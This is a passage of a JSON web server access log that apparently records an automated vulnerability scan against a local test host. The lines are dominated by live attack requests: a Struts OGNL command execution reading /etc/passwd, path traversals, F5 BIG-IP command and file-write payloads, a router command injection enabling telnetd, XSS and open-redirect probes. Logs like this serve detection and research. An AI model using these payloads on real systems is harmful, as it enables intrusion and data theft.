/modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"option_key=a&perpose=update&callback=phpinfo","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hsqldb%0a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infophp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 